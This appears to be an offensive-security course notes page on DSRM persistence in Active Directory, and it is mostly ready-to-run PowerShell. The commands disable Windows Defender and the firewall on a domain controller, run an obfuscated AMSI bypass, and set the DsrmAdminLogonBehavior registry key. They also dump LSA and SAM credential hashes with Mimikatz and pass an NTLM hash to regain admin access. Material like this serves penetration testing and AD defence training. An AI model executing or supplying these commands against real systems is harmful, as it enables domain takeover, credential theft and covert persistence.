Persistence - DSRM

  • DSRM is Directory Services Restore Mode.

  • There is a local administrator on every DC called "Administrator" whose password is the DSRM password.

  • DSRM password (SafeModePassword) is required when a server is promoted to Domain Controller and it is rarely changed.

  • After altering the configuration on the DC, it is possible to pass the NTLM hash of this user to access the DC.

  • Needs DA Priv

DSRM

#From the Domain Admin Powershell Permission
#Create Session
$sess = New-PSSession -ComputerName dcorp-dc

#Disable Firewall and AV
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess
Invoke-Command -Session $sess -FilePath c:\AD\Tools\Invoke-mimikatz.ps1
#ByPass AMSI
powershell -ep bypass
SET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )


#Enter Session
Enter-PSSession $sess

#Enter New KeyReg
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
#If KeyReg Exist:
#Get-ItemProperty to see if DsrmAdminLogonBehavior is set to 2
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"
#If DsrmAdminLogonBehavior is not set to 2
Set-ItemProperty -Name "DsrmAdminLogonBehavior" -Value 2
#Get-ItemProperty to see if DsrmAdminLogonBehavior is set to 2
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"


#Compare the Administrator hash with the Administrator hash of below command
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc


#Dump DSRM password (needs DA privs) to be used for the command below
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc

---
#Use below command to pass the hash. Use the hash from the above command
#Needs to be excute from another powershell windows with local admin
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'

#Session
$sess = New-PSSession -ComputerName dcorp-dc
Enter-PSSession $sess
#or
ls \\dcorp-dc\c$

Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"

we can see that DsrmAdminLogonBehavior is set to 2

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc

PreviousPersistence – Custom SSPNextPersistence - Skeleton Key

Last updated

Was this helpful?